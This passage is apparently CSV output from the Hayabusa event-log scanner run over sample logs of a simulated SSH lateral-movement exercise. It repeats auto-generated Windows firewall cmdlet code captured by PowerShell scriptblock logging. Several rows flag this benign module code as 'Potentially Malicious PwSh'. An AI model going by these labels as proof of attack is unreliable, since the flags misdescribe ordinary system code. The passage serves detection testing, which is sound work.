$__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' -Alias '*' function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] 
[string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) 
$__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { 
try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' -Alias '*' function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; 
ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { 
[object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" 
